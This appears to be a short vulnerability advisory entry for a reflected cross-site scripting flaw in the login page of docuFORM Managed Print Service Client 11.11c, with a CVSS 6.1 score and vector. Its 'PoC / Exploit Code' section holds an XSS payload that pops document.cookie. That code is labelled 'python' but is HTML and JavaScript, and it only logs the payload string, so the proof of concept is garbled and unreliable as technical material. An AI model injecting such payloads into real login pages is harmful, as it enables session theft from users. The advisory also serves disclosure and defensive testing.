docuFORM Managed Print Service Client 11.11c is vulnerable to a reflected cross site scripting attack via the login page of the application.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
docuFORM Managed Print Service Client 11.11c
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for Reflected XSS -->
<!-- Usage: Append payload to the vulnerable login parameter -->
<script>
// Malicious payload to be injected
var payload = '"><script>alert(document.cookie)</script>';
// Simulating the attack vector
console.log('Injecting payload: ' + payload);
// If vulnerable, the browser executes: alert(document.cookie);
</script>